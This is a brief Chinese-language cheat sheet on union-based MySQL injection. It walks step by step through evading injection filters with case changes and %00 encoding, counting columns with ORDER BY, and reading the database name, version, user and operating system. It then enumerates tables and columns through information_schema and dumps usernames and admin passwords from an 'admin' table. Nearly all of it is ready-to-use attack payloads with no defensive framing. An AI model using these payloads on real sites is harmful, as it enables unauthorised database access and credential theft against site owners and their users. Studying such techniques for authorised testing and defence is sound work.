Mysql注入详解
1.防注入绕过:1.大小写绕过 2. %00编码绕过
2.判断多少列:order by xx
3.爆出数据类型不匹配的列:id=-294 UNION SELECT 1,2,3,4,5,6,7,8,9 from information_schema.tables
4.获取基本信息: database():数据库名 version():数据库版本
user():数据库用户 @@version_compile_os:操作系统
例:UNION SELECT 1,user(),3,4,5,6,7,8
5.获取表名
union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=0x(数据库名的16进制)
6.指定表名获取该表名下的所有列名:
union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x(表名的16进制)
7.获取指定列名下的数据:
union select 1,group_concat(name,0x5c,adminpass),3,4,5,6,7,8 from admin